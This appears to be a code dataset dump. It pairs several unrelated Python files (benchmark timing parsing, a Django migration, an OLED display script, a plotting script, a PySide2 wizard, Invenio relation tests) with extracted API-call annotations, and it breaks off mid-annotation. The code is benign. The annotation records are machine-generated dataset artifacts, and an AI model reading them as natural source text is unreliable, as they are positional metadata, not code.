code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
#!/usr/bin/python2
# Copyright (c) 2011 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This script produces csv data from multiple benchmarking runs with the
# spec2k harness.
#
# A typical usage would be
#
# export SPEC_RUN_REPETITIONS=3
# ./run_all.sh RunTimedBenchmarks SetupPnaclX8664Opt ref > ../timings.setting1
# [change the compiler settings]
# ./run_all.sh RunTimedBenchmarks SetupPnaclX8664Opt ref > ../timings.setting2
#
# tests/spec2k/extract_timings.py time.inline time.noinline time.lowinline
#
# which produces output like:
# name , inline , noinline , lowinline
# ammp , 250.47 , 263.83 , 262.20
# art , 222.12 , 219.36 , 259.28
# bzip2 , 179.05 , 194.05 , missing
# crafty , 60.24 , 73.33 , missing
# ...
#
# Alternatively, if your data already has the form:
#
# <bechmark> <setting> <value>
#
# You can run the tool like so:
# tests/spec2k/extract_timings.py < <data-file>
import sys
# Names of the individual settings, derived from the file names in the order
# they were given on the command-line.
SETTINGS = []
# Dictionary of dictionaries accessed like so:
# BENCHMARKS['benchmark']['setting']
BENCHMARKS = {}


def AddDataPoint(benchmark, setting, v):
  """Record value v for (benchmark, setting), remembering setting order."""
  if setting not in SETTINGS:
    # TODO: linear search is slightly inefficient
    SETTINGS.append(setting)
  BENCHMARKS.setdefault(benchmark, {})[setting] = v
def ExtractResults(name, inp):
  """Scan inp for chrome-perf style RESULT lines and record the fastest run.

  A matching line looks like:
  'RESULT runtime_equake: pnacl.opt.x8664= [107.36,116.28,116.4] secs'
  The benchmark name is the part after the last '_' in the second token;
  the minimum of the bracketed samples is recorded under setting `name`.
  """
  for raw in inp:
    if not raw.startswith('RESULT'):
      continue
    tokens = raw.split()
    assert tokens[0] == 'RESULT'
    assert tokens[1].endswith(':')
    assert tokens[2].endswith('=')
    assert tokens[3].startswith('[')
    assert tokens[3].endswith(']')
    benchmark = tokens[1][:-1].split('_')[-1]
    samples = [float(s) for s in tokens[3][1:-1].split(',')]
    AddDataPoint(benchmark, name, min(samples))
# Note: we are intentionally not using the csv module
# as it does not provide nicely formatted output
def DumpRow(row):
  """Write one aligned csv-ish row to stdout.

  row[0] is the name (left-aligned, 20 columns); every other entry is either
  a number (printed with 2 decimals) or a placeholder string like 'missing'
  (printed verbatim, right-aligned).
  """
  sys.stdout.write('%-20s' % row[0])
  for val in row[1:]:
    # isinstance() instead of type() == str: idiomatic, and also accepts
    # str subclasses.
    if isinstance(val, str):
      sys.stdout.write(', %10s' % val)
    else:
      sys.stdout.write(', %10.2f' % val)
  sys.stdout.write('\n')
def DumpCsv():
  """Print the collected table; absent (benchmark, setting) cells -> 'missing'.

  Rows are sorted by benchmark name; columns follow SETTINGS order.
  """
  DumpRow(['name'] + SETTINGS)
  for benchmark in sorted(BENCHMARKS.keys()):
    values = BENCHMARKS[benchmark]
    DumpRow([benchmark] + [values.get(s, 'missing') for s in SETTINGS])
# Entry point.
# With file arguments: each file is parsed for chrome-perf style RESULT
# lines and the setting name is derived from the file extension (e.g.
# timings.setting1 -> "setting1"), per the header comment's usage example.
# Without arguments: read "<benchmark> <setting> <value>" triples from stdin.
if len(sys.argv) > 1:
  for f in sys.argv[1:]:
    # Setting name = suffix after the last '.' of the file name.
    setting = f.split('.')[-1]
    fin = open(f)
    ExtractResults(setting, fin)
    fin.close()
else:
  for line in sys.stdin:
    tokens = line.split()
    # Skip blank lines.
    if not tokens: continue
    assert len(tokens) == 3
    AddDataPoint(tokens[0], tokens[1], float(tokens[2]))
# Print the aggregated table.
DumpCsv()
|
[
"sys.stdout.write"
] |
[((2320, 2354), 'sys.stdout.write', 'sys.stdout.write', (["('%-20s' % row[0])"], {}), "('%-20s' % row[0])\n", (2336, 2354), False, 'import sys\n'), ((2494, 2516), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (2510, 2516), False, 'import sys\n'), ((2408, 2440), 'sys.stdout.write', 'sys.stdout.write', (["(', %10s' % val)"], {}), "(', %10s' % val)\n", (2424, 2440), False, 'import sys\n'), ((2457, 2491), 'sys.stdout.write', 'sys.stdout.write', (["(', %10.2f' % val)"], {}), "(', %10.2f' % val)\n", (2473, 2491), False, 'import sys\n')]
|
# Generated by Django 3.1.3 on 2020-11-23 10:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Allow the six medication fields to be blank with an empty default."""

    dependencies = [
        ('fit', '0004_auto_20201123_1625'),
    ]

    # med1..med6 all receive the identical field definition, so the six
    # AlterField operations are generated with a comprehension instead of
    # six copy-pasted literals.
    operations = [
        migrations.AlterField(
            model_name='disease',
            name='med{}'.format(index),
            field=models.CharField(blank=True, default='', max_length=60),
        )
        for index in range(1, 7)
    ]
|
[
"django.db.models.CharField"
] |
[((331, 386), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (347, 386), False, 'from django.db import migrations, models\n'), ((507, 562), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (523, 562), False, 'from django.db import migrations, models\n'), ((683, 738), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (699, 738), False, 'from django.db import migrations, models\n'), ((859, 914), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (875, 914), False, 'from django.db import migrations, models\n'), ((1035, 1090), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (1051, 1090), False, 'from django.db import migrations, models\n'), ((1211, 1266), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(60)'}), "(blank=True, default='', max_length=60)\n", (1227, 1266), False, 'from django.db import migrations, models\n')]
|
# For use with I2C OLED screens.
# This requires the Adafruit Circuit Python OLED library, which superceeds earlier Adafruit OLED libraries
# Install it with `pip install adafruit-circuitpython-ssd1306`
import time
from subprocess import check_output
from board import SCL, SDA
import busio
from PIL import Image, ImageDraw, ImageFont
import adafruit_ssd1306
def get_ip():
    """Return this host's primary IP address via `hostname -I` (or '' if none)."""
    cmd = "hostname -I | cut -d\' \' -f1"
    output = check_output(cmd, shell=True)
    return output.decode("utf-8").strip()
# Create the I2C interface.
i2c = busio.I2C(SCL, SDA)
# Create the SSD1306 OLED class.
# The first two parameters are the pixel width and pixel height. Change these
# to the right size for your display!
disp = adafruit_ssd1306.SSD1306_I2C(128, 32, i2c)
# Clear display.
disp.fill(0)
disp.show()
# Create blank image for drawing.
# Make sure to create image with mode '1' for 1-bit color.
width = disp.width
height = disp.height
image = Image.new("1", (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0, 0, width, height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
# NOTE(review): `bottom` is computed but never used below.
bottom = height - padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 0
# Load default font.
font = ImageFont.load_default()
# Show an initial status message, then poll for an IP once per second.
no_IP = True
draw.text((x, top + 0), "Starting search for WiFi", font=font, fill=255)
disp.image(image)
disp.show()
time.sleep(1)
while no_IP:
    # Clear display.
    draw.rectangle((0, 0, width, height), outline=0, fill=0)
    disp.fill(0)
    disp.show()
    ip_addr = get_ip()
    if ip_addr:
        # Got an address: show it and leave the loop after this iteration.
        draw.text((x, top + 0), "IP: " + ip_addr, font=font, fill=255)
        no_IP = False
    else:
        draw.text((x, top + 0), "Searching for WiFi", font=font, fill=255)
    disp.image(image)
    disp.show()
    time.sleep(1)
|
[
"PIL.Image.new",
"busio.I2C",
"PIL.ImageFont.load_default",
"subprocess.check_output",
"time.sleep",
"PIL.ImageDraw.Draw",
"adafruit_ssd1306.SSD1306_I2C"
] |
[((514, 533), 'busio.I2C', 'busio.I2C', (['SCL', 'SDA'], {}), '(SCL, SDA)\n', (523, 533), False, 'import busio\n'), ((692, 734), 'adafruit_ssd1306.SSD1306_I2C', 'adafruit_ssd1306.SSD1306_I2C', (['(128)', '(32)', 'i2c'], {}), '(128, 32, i2c)\n', (720, 734), False, 'import adafruit_ssd1306\n'), ((920, 951), 'PIL.Image.new', 'Image.new', (['"""1"""', '(width, height)'], {}), "('1', (width, height))\n", (929, 951), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((999, 1020), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', (['image'], {}), '(image)\n', (1013, 1020), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((1379, 1403), 'PIL.ImageFont.load_default', 'ImageFont.load_default', ([], {}), '()\n', (1401, 1403), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((1522, 1535), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1532, 1535), False, 'import time\n'), ((1878, 1891), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1888, 1891), False, 'import time\n'), ((424, 453), 'subprocess.check_output', 'check_output', (['cmd'], {'shell': '(True)'}), '(cmd, shell=True)\n', (436, 453), False, 'from subprocess import check_output\n')]
|
import numpy as np
import matplotlib.pyplot as plt
#plt.rc('font', family='serif')
#plt.rc('text', usetex=True)

# Combine the two solution-component errors into one l_2 error per run.
sol1err = np.fromfile('../out/sol1err')
sol2err = np.fromfile('../out/sol2err')
L2err = np.sqrt(sol2err**2 + sol1err**2)
h = np.fromfile('../out/h')
# NOTE(review): `x` is never used below — candidate for removal.
x = np.sort(h)

fig, ax = plt.subplots(1, 1)
for i in range(1, 10):
    # Reference line of slope i in log-log space, anchored at the first
    # measured data point (L2err[0], h[0]).
    hh = np.logspace(np.log10(min(h)), np.log10(max(h)), 2500)
    b = np.log10(L2err[0] / (10**(i * np.log10(h[0]))))
    y = 10**(i * np.log10(hh) + b)
    # Only draw the part of the reference line above the smallest observed
    # error, so the guides do not clutter the bottom of the plot.
    mask = (y > min(L2err))
    hh = hh[mask]
    y = y[mask]
    # Raw strings: '\p' and '\D' are not escape sequences, so the label text
    # is unchanged, but non-raw literals trigger invalid-escape warnings on
    # modern Python.
    ax.loglog(hh, y, ':', label=r'$\propto (\Delta t)^{%d}$' % i)
    ax.text(min(hh), min(y), str(i), ha='right', va='bottom')
ax.loglog(h, L2err, 'k.', label='results')
ax.set_xlabel(r'step size $(\Delta t)$')
ax.set_ylabel('$l_2$ error')
ax.legend()
ax.set_title('Convergence Test')
plt.tight_layout()
plt.show()
|
[
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.show",
"numpy.fromfile",
"numpy.sort",
"numpy.log10",
"matplotlib.pyplot.subplots",
"numpy.sqrt"
] |
[((124, 153), 'numpy.fromfile', 'np.fromfile', (['"""../out/sol1err"""'], {}), "('../out/sol1err')\n", (135, 153), True, 'import numpy as np\n'), ((164, 193), 'numpy.fromfile', 'np.fromfile', (['"""../out/sol2err"""'], {}), "('../out/sol2err')\n", (175, 193), True, 'import numpy as np\n'), ((202, 238), 'numpy.sqrt', 'np.sqrt', (['(sol2err ** 2 + sol1err ** 2)'], {}), '(sol2err ** 2 + sol1err ** 2)\n', (209, 238), True, 'import numpy as np\n'), ((239, 262), 'numpy.fromfile', 'np.fromfile', (['"""../out/h"""'], {}), "('../out/h')\n", (250, 262), True, 'import numpy as np\n'), ((267, 277), 'numpy.sort', 'np.sort', (['h'], {}), '(h)\n', (274, 277), True, 'import numpy as np\n'), ((289, 307), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (301, 307), True, 'import matplotlib.pyplot as plt\n'), ((826, 844), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (842, 844), True, 'import matplotlib.pyplot as plt\n'), ((845, 855), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (853, 855), True, 'import matplotlib.pyplot as plt\n'), ((460, 472), 'numpy.log10', 'np.log10', (['hh'], {}), '(hh)\n', (468, 472), True, 'import numpy as np\n'), ((427, 441), 'numpy.log10', 'np.log10', (['h[0]'], {}), '(h[0])\n', (435, 441), True, 'import numpy as np\n')]
|
from PySide2 import QtWidgets, QtCore
import os
from ..utils import load_ui_file
from ..widgets.filter import FilterListerWidget, parse_filter_widget
from ..widgets.geo import LocationSelectorWidget
from ...utils import findMainWindow
from futura.utils import create_filter_from_description
from futura import w
from futura.proxy import WurstProcess
class RegionalisationWizard(QtWidgets.QWizard):
    """Wizard that guides the user through regionalising a set of processes."""

    def __init__(self, parent=None):
        super(RegionalisationWizard, self).__init__(parent)

        # Load the Qt Designer layout that ships next to this module.
        ui_path = 'regionalisation_wizard.ui'
        ui_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ui_path)
        load_ui_file(ui_path, self)

        self.filter_widget = FilterListerWidget()
        self.filterLayout.addWidget(self.filter_widget)

        self.location_widget = LocationSelectorWidget()
        self.locationLayout.addWidget(self.location_widget)

        self.currentIdChanged.connect(self.page_change)

    def page_change(self, page_id):
        """Run per-page setup when the wizard switches pages."""
        if page_id == 1:
            self.restrict_locations()
        elif page_id == 2:
            self.confirm_setup()

    def confirm_setup(self):
        """Fill the confirmation page with the matched processes and locations."""
        print("This is the last page")
        this_filter = create_filter_from_description(parse_filter_widget(self.filter_widget))
        db = findMainWindow().loader.database.db
        this_item_set = [WurstProcess(x) for x in w.get_many(db, *this_filter)]
        #this_item = w.get_one(db, *this_filter)
        print(this_item_set)
        item_string = ""
        for n, this_item in enumerate(this_item_set):
            item_string += "{} ({}) [{}]".format(this_item['name'], this_item['unit'], this_item['location'])
            # BUG FIX: the last index is len - 1; the old `n != len(...)` test
            # was always true, so a stray trailing newline was appended.
            if n != len(this_item_set) - 1:
                item_string += "\n"
        self.processLabel.setText(item_string)
        if len(this_item_set) > 1:
            self.processDescriptionLabel.setText('Base processes: ')
        else:
            self.processDescriptionLabel.setText('Base process: ')
        location_list = ", ".join([x['display'] for x in self.location_widget.checked_items])
        self.locationLabel.setText(location_list)

    def restrict_locations(self):
        """Disable locations for which a variant of the base process exists."""
        base_filter = parse_filter_widget(self.filter_widget)
        # Drop location clauses so the process can be found in ALL locations.
        no_location_filter = [x for x in base_filter if x['args'][0] != 'location']
        this_filter = create_filter_from_description(base_filter)
        no_location = create_filter_from_description(no_location_filter)
        db = findMainWindow().loader.database.db
        this_item = w.get_one(db, *this_filter)
        item_location = this_item['location']
        other_items = w.get_many(db, *no_location)
        other_locations = [x['location'] for x in other_items]
        # 'RoW' is a catch-all region, not a concrete location choice.
        other_locations = [x for x in other_locations if x != 'RoW']
        locations = list(set(other_locations + [item_location]))
        print(locations)
        self.location_widget.find_and_disable(locations)
|
[
"futura.utils.create_filter_from_description",
"os.path.abspath",
"futura.proxy.WurstProcess",
"futura.w.get_one",
"futura.w.get_many"
] |
[((2328, 2371), 'futura.utils.create_filter_from_description', 'create_filter_from_description', (['base_filter'], {}), '(base_filter)\n', (2358, 2371), False, 'from futura.utils import create_filter_from_description\n'), ((2394, 2444), 'futura.utils.create_filter_from_description', 'create_filter_from_description', (['no_location_filter'], {}), '(no_location_filter)\n', (2424, 2444), False, 'from futura.utils import create_filter_from_description\n'), ((2514, 2541), 'futura.w.get_one', 'w.get_one', (['db', '*this_filter'], {}), '(db, *this_filter)\n', (2523, 2541), False, 'from futura import w\n'), ((2610, 2638), 'futura.w.get_many', 'w.get_many', (['db', '*no_location'], {}), '(db, *no_location)\n', (2620, 2638), False, 'from futura import w\n'), ((1346, 1361), 'futura.proxy.WurstProcess', 'WurstProcess', (['x'], {}), '(x)\n', (1358, 1361), False, 'from futura.proxy import WurstProcess\n'), ((591, 616), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (606, 616), False, 'import os\n'), ((1371, 1399), 'futura.w.get_many', 'w.get_many', (['db', '*this_filter'], {}), '(db, *this_filter)\n', (1381, 1399), False, 'from futura import w\n')]
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test records relations siblings."""
import json
from flask import url_for
from invenio_app_ils.documents.api import Document
from tests.helpers import get_test_record, user_login
from .helpers import (recrel_assert_record_relations,
recrel_choose_endpoints_and_do_request)
def _test_sibl_language_relation(client, json_headers):
    """Test creation/deletion siblings language relations."""
    first_pid_value = "docid-1"
    first_pid_type = "docid"
    second_pid_value = "docid-2"
    second_pid_type = "docid"
    third_pid_value = "docid-6"
    third_pid_type = "docid"
    relation_type = "language"

    payload = [
        {
            "pid_value": second_pid_value,
            "pid_type": second_pid_type,
            "relation_type": relation_type,
        },
        {
            "pid_value": third_pid_value,
            "pid_type": third_pid_type,
            "relation_type": relation_type,
        },
    ]

    def _relation(pid_value, pid_type, rec, with_edition=False):
        """Expected serialization of one language relation pointing at `rec`."""
        metadata = {
            "title": rec["title"],
            "languages": rec["languages"],
            "document_type": rec["document_type"],
            "publication_year": rec["publication_year"],
        }
        if with_edition:
            metadata["edition"] = rec["edition"]
        return {
            "pid_value": pid_value,
            "pid_type": pid_type,
            "relation_type": "language",
            "record_metadata": metadata,
        }

    def _test_create():
        """Test relation creation."""
        rec1, rec2 = recrel_choose_endpoints_and_do_request(
            (client, json_headers, "POST"),
            (
                first_pid_value,
                first_pid_type,
                second_pid_value,
                second_pid_type,
            ),
            payload,
        )
        rec3 = Document.get_record_by_pid(third_pid_value)
        rec3 = rec3.replace_refs()
        # Every record must see the two other documents as language siblings;
        # only docid-1 has an `edition` field serialized in its metadata.
        recrel_assert_record_relations(
            rec1,
            expected={
                "relations": {
                    "language": [
                        _relation(second_pid_value, second_pid_type, rec2),
                        _relation(third_pid_value, third_pid_type, rec3),
                    ]
                }
            },
        )
        recrel_assert_record_relations(
            rec2,
            expected={
                "relations": {
                    "language": [
                        _relation(first_pid_value, first_pid_type, rec1,
                                  with_edition=True),
                        _relation(third_pid_value, third_pid_type, rec3),
                    ]
                }
            },
        )
        recrel_assert_record_relations(
            rec3,
            expected={
                "relations": {
                    "language": [
                        _relation(first_pid_value, first_pid_type, rec1,
                                  with_edition=True),
                        _relation(second_pid_value, second_pid_type, rec2),
                    ]
                }
            },
        )

    def _test_delete():
        """Test relation deletion."""
        rec1, rec2 = recrel_choose_endpoints_and_do_request(
            (client, json_headers, "DELETE"),
            (
                first_pid_value,
                first_pid_type,
                second_pid_value,
                second_pid_type,
            ),
            payload,
        )
        rec3 = Document.get_record_by_pid(third_pid_value)
        rec3 = rec3.replace_refs()
        for rec in (rec1, rec2, rec3):
            recrel_assert_record_relations(rec, expected={"relations": {}})

    _test_create()
    _test_delete()
    # recreate for the next one, to have some more valuable test data
    _test_create()
def _test_sibl_edition_relation(client, json_headers, testdata):
    """Test creation/deletion siblings edition relations."""
    first_pid_value = "docid-3"
    first_pid_type = "docid"
    second_pid_value = "docid-1"
    second_pid_type = "docid"
    relation_type = "edition"

    payload = {
        "pid_value": second_pid_value,
        "pid_type": second_pid_type,
        "relation_type": relation_type,
    }

    def _expected(pid_value, pid_type, rel_type, rec, fields):
        """Expected serialization of one relation pointing at `rec`."""
        return {
            "pid_value": pid_value,
            "pid_type": pid_type,
            "relation_type": rel_type,
            "record_metadata": {name: rec[name] for name in fields},
        }

    def _language_relations():
        """Language relations docid-1 keeps from the previous language test."""
        rec_docid_2 = get_test_record(testdata, "documents", "docid-2")
        rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
        common = ("title", "languages", "document_type", "publication_year")
        return [
            _expected(rec_docid_2["pid"], "docid", "language",
                      rec_docid_2, common),
            _expected(rec_docid_6["pid"], "docid", "language",
                      rec_docid_6, common),
        ]

    def _test_create():
        """Test relation creation."""
        rec1, rec2 = recrel_choose_endpoints_and_do_request(
            (client, json_headers, "POST"),
            (
                first_pid_value,
                first_pid_type,
                second_pid_value,
                second_pid_type,
            ),
            payload,
        )
        # docid-3 now lists docid-1 as another edition.
        recrel_assert_record_relations(
            rec1,
            expected={
                "relations": {
                    "edition": [
                        _expected(
                            second_pid_value,
                            second_pid_type,
                            "edition",
                            rec2,
                            ("title", "edition", "languages",
                             "document_type", "publication_year"),
                        )
                    ]
                }
            },
        )
        # docid-1 gains the edition relation and keeps its language relations.
        recrel_assert_record_relations(
            rec2,
            expected={
                "relations": {
                    "edition": [
                        _expected(
                            first_pid_value,
                            first_pid_type,
                            "edition",
                            rec1,
                            ("title", "edition", "document_type",
                             "publication_year"),
                        )
                    ],
                    "language": _language_relations(),
                }
            },
        )

    def _test_delete():
        """Test relation deletion."""
        rec1, rec2 = recrel_choose_endpoints_and_do_request(
            (client, json_headers, "DELETE"),
            (
                first_pid_value,
                first_pid_type,
                second_pid_value,
                second_pid_type,
            ),
            payload,
        )
        recrel_assert_record_relations(rec1, expected={"relations": {}})
        recrel_assert_record_relations(
            rec2,
            expected={"relations": {"language": _language_relations()}},
        )

    def _test_empty_edition_field():
        """Documents without an `edition` field cannot be related as editions."""
        edition_first_pid_value = "docid-11"
        edition_first_pid_type = "docid"
        edition_second_pid_value = "docid-12"
        edition_second_pid_type = "docid"
        create_payload = {
            "pid_value": edition_second_pid_value,
            "pid_type": edition_second_pid_type,
            "relation_type": relation_type,
        }
        rec1, rec2 = recrel_choose_endpoints_and_do_request(
            (client, json_headers, "POST"),
            (
                edition_first_pid_value,
                edition_first_pid_type,
                edition_second_pid_value,
                edition_second_pid_type,
            ),
            create_payload,
            expect_status_code=400
        )

    _test_create()
    _test_delete()
    # recreate for the next one, to have some more valuable test data
    _test_create()
    _test_empty_edition_field()
def _test_sibl_other_relation(client, json_headers, testdata):
    """Test creation/deletion siblings other relations."""
    first_pid_value = "docid-2"
    first_pid_type = "docid"
    second_pid_value = "docid-3"
    second_pid_type = "docid"
    relation_type = "other"

    payload = {
        "pid_value": second_pid_value,
        "pid_type": second_pid_type,
        "relation_type": relation_type,
        "note": "exercise",
    }

    def _expected(pid_value, pid_type, rel_type, rec, fields, note=None):
        """Expected serialization of one relation pointing at `rec`."""
        relation = {
            "pid_value": pid_value,
            "pid_type": pid_type,
            "relation_type": rel_type,
            "record_metadata": {name: rec[name] for name in fields},
        }
        if note is not None:
            relation["note"] = note
        return relation

    def _docid_2_language_relations():
        """Language relations docid-2 keeps from the earlier language test."""
        rec_docid_1 = get_test_record(testdata, "documents", "docid-1")
        rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
        return [
            _expected(
                rec_docid_1["pid"], "docid", "language", rec_docid_1,
                ("title", "edition", "languages", "document_type",
                 "publication_year"),
            ),
            _expected(
                rec_docid_6["pid"], "docid", "language", rec_docid_6,
                ("title", "document_type", "languages", "publication_year"),
            ),
        ]

    def _docid_1_edition_relation():
        """Edition relation docid-3 keeps from the earlier edition test."""
        rec_docid_1 = get_test_record(testdata, "documents", "docid-1")
        return [
            _expected(
                rec_docid_1["pid"], "docid", "edition", rec_docid_1,
                ("title", "edition", "languages", "document_type",
                 "publication_year"),
            )
        ]

    def _test_create():
        """Test relation creation."""
        rec1, rec2 = recrel_choose_endpoints_and_do_request(
            (client, json_headers, "POST"),
            (
                first_pid_value,
                first_pid_type,
                second_pid_value,
                second_pid_type,
            ),
            payload,
        )
        recrel_assert_record_relations(
            rec1,
            expected={
                # "other" relations also carry their note as extra metadata.
                "relations_extra_metadata": {
                    "other": [
                        {
                            "pid_value": second_pid_value,
                            "pid_type": second_pid_type,
                            "note": "exercise",
                        }
                    ]
                },
                "relations": {
                    "language": _docid_2_language_relations(),
                    "other": [
                        _expected(
                            second_pid_value, second_pid_type, "other", rec2,
                            ("title", "edition", "document_type",
                             "publication_year"),
                            note="exercise",
                        )
                    ],
                },
            },
        )
        recrel_assert_record_relations(
            rec2,
            expected={
                "relations": {
                    "edition": _docid_1_edition_relation(),
                    "other": [
                        _expected(
                            first_pid_value, first_pid_type, "other", rec1,
                            ("title", "languages", "document_type",
                             "publication_year"),
                            note="exercise",
                        )
                    ],
                }
            },
        )

    def _test_delete():
        """Test relation deletion."""
        rec1, rec2 = recrel_choose_endpoints_and_do_request(
            (client, json_headers, "DELETE"),
            (
                first_pid_value,
                first_pid_type,
                second_pid_value,
                second_pid_type,
            ),
            payload,
        )
        # Only the "other" relation is removed; pre-existing language and
        # edition relations from the earlier tests survive.
        recrel_assert_record_relations(
            rec1,
            expected={"relations": {"language": _docid_2_language_relations()}},
        )
        recrel_assert_record_relations(
            rec2,
            expected={"relations": {"edition": _docid_1_edition_relation()}},
        )

    _test_create()
    _test_delete()
    # recreate for the next one, to have some more valuable test data
    _test_create()
def _test_sibl_invalid_relations_should_fail(
    client, json_headers, invalids, status_code=400
):
    """Test relation creation with invalid siblings should fail."""
    api_endpoint_documents = "invenio_app_ils_relations.docid_relations"
    api_endpoint_series = "invenio_app_ils_relations.serid_relations"

    for invalid in invalids:
        relation_payload = {
            "pid_value": invalid["second_pid_value"],
            "pid_type": invalid["second_pid_type"],
            "relation_type": invalid["relation_type"],
        }
        # The endpoint is chosen from the type of the *first* record.
        if invalid["first_pid_type"] == "docid":
            api_endpoint = api_endpoint_documents
        else:
            api_endpoint = api_endpoint_series
        url = url_for(api_endpoint, pid_value=invalid["first_pid_value"])

        res = client.post(
            url, headers=json_headers, data=json.dumps(relation_payload)
        )
        assert res.status_code == status_code
        if status_code == 400:
            # Validation errors must mention both offending pids.
            error = json.loads(res.data.decode("utf-8"))
            assert "message" in error
            assert invalid["first_pid_value"] in error["message"]
            assert invalid["second_pid_value"] in error["message"]
def test_siblings_relations(client, json_headers, testdata, users):
    """Test siblings relations."""
    # only one test method to speed up tests and avoid testdata recreation at
    # each test. As drawback, testdata is not cleaned between each test, so
    # do not change the order of execution of the following tests :)
    # Anonymous users may not create relations: expect 401 Unauthorized.
    _test_sibl_invalid_relations_should_fail(
        client,
        json_headers,
        [
            {
                "first_pid_value": "docid-1",
                "first_pid_type": "docid",
                "second_pid_value": "docid-2",
                "second_pid_type": "docid",
                "relation_type": "language",
            }
        ],
        status_code=401,
    )
    user_login(client, "librarian", users)
    # docid-1 --language--> docid-2 and docid-6
    _test_sibl_language_relation(client, json_headers)
    # docid-3 --edition--> docid-1
    _test_sibl_edition_relation(client, json_headers, testdata)
    # docid-2 --other--> docid-3
    _test_sibl_other_relation(client, json_headers, testdata)
    # test wrong relations
    invalids = [
        # different pid type
        {
            "first_pid_value": "docid-1",
            "first_pid_type": "docid",
            "second_pid_value": "serid-1",
            "second_pid_type": "serid",
            "relation_type": "language",
        },
        # invalid edition: document with serial
        {
            "first_pid_value": "serid-3",
            "first_pid_type": "serid",
            "second_pid_value": "docid-5",
            "second_pid_type": "docid",
            "relation_type": "edition",
        },
        # different pid type
        {
            "first_pid_value": "serid-1",
            "first_pid_type": "serid",
            "second_pid_value": "docid-1",
            "second_pid_type": "docid",
            "relation_type": "other",
        },
        # same record
        {
            "first_pid_value": "docid-6",
            "first_pid_type": "docid",
            "second_pid_value": "docid-6",
            "second_pid_type": "docid",
            "relation_type": "language",
        },
    ]
    _test_sibl_invalid_relations_should_fail(client, json_headers, invalids)
|
[
"invenio_app_ils.documents.api.Document.get_record_by_pid",
"tests.helpers.get_test_record",
"tests.helpers.user_login",
"json.dumps",
"flask.url_for"
] |
[((24059, 24097), 'tests.helpers.user_login', 'user_login', (['client', '"""librarian"""', 'users'], {}), "(client, 'librarian', users)\n", (24069, 24097), False, 'from tests.helpers import get_test_record, user_login\n'), ((1538, 1581), 'invenio_app_ils.documents.api.Document.get_record_by_pid', 'Document.get_record_by_pid', (['third_pid_value'], {}), '(third_pid_value)\n', (1564, 1581), False, 'from invenio_app_ils.documents.api import Document\n'), ((6195, 6238), 'invenio_app_ils.documents.api.Document.get_record_by_pid', 'Document.get_record_by_pid', (['third_pid_value'], {}), '(third_pid_value)\n', (6221, 6238), False, 'from invenio_app_ils.documents.api import Document\n'), ((8269, 8318), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-2"""'], {}), "(testdata, 'documents', 'docid-2')\n", (8284, 8318), False, 'from tests.helpers import get_test_record, user_login\n'), ((8341, 8390), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-6"""'], {}), "(testdata, 'documents', 'docid-6')\n", (8356, 8390), False, 'from tests.helpers import get_test_record, user_login\n'), ((11022, 11071), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-2"""'], {}), "(testdata, 'documents', 'docid-2')\n", (11037, 11071), False, 'from tests.helpers import get_test_record, user_login\n'), ((11094, 11143), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-6"""'], {}), "(testdata, 'documents', 'docid-6')\n", (11109, 11143), False, 'from tests.helpers import get_test_record, user_login\n'), ((14444, 14493), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-1"""'], {}), "(testdata, 'documents', 'docid-1')\n", (14459, 14493), False, 'from tests.helpers import get_test_record, user_login\n'), ((14516, 14565), 'tests.helpers.get_test_record', 'get_test_record', 
